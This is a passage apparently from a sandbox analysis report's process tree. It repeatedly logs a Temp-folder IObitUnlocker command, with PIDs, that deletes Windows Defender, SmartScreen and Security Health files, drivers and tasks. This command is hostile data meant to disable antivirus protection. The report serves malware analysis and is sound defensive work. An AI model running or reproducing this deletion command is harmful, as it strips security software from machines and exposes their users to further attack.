Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  PID:12244
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    PID:11524
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      PID:12248
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        PID:11992
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          PID:11856
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            PID:10356
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              PID:12260
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                PID:11852
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\IObitUnlocker\IObitUnlocker.exe /Delete /Advanced "C:\ProgramData\Microsoft\Windows Defender","C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection","C:\ProgramData\Microsoft\Windows Security Health","C:\ProgramData\Microsoft\Storage Health","C:\Program Files\Windows Defender","C:\Program Files\Windows Defender Sleep","C:\Program Files\Windows Defender Advanced Threat Protection","C:\Program Files\Windows Security","C:\Program Files\PCHealthCheck","C:\Program Files\Microsoft Update Health Tools","C:\Program Files (x86)\Windows Defender","C:\Program Files (x86)\Windows Defender Advanced Threat Protection","C:\Windows\system32\security\database","C:\Windows\system32\HealthAttestationClient","C:\Windows\system32\SecurityHealth","C:\Windows\system32\WebThreatDefSvc","C:\Windows\system32\Sgrm","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\system32\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\system32\Tasks_Migrated\Microsoft\Windows\Windows Defender","C:\Windows\system32\drivers\wd","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender","C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\DefenderPerformance","C:\Windows\Containers\WindowsDefenderApplicationGuard.wim","C:\Windows\Containers\serviced\WindowsDefenderApplicationGuard.wim","C:\Windows\system32\SecurityHealthService.exe","C:\Windows\system32\SecurityHealthService.exe_fuck","C:\Windows\system32\SecurityHealthSystray.exe","C:\Windows\system32\SecurityHealthHost.exe","C:\Windows\system32\SecurityHealthAgent.dll","C:\Windows\system32\SecurityHealthSSO.dll","C:\Windows\system32\SecurityHealthProxyStub.dll","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderApiLogger.etl","C:\Windows\system32\LogFiles\WMI\RtBackup\EtwRTDefenderAuditLogger.etl","C:\Windows\system32\smartscreen.dll","C:\Windows\system32\wscisvif.dll","C:\Windows\system32\wscproxystub.dll","C:\Windows\system32\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\wscsvc.dll","C:\Windows\system32\SecurityHealthCore.dll","C:\Windows\system32\SecurityHealthSsoUdk.dll","C:\Windows\system32\SecurityHealthUdk.dll","C:\Windows\system32\smartscreen.exe","C:\Windows\system32\smartscreen.exedel","C:\Windows\SysWOW64\smartscreen.dll","C:\Windows\SysWOW64\wscisvif.dll","C:\Windows\SysWOW64\wscproxystub.dll","C:\Windows\SysWOW64\windowsdefenderapplicationguardcsp.dll","C:\Windows\system32\Tasks\Microsoft\Windows\Windows Defender"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                10⤵
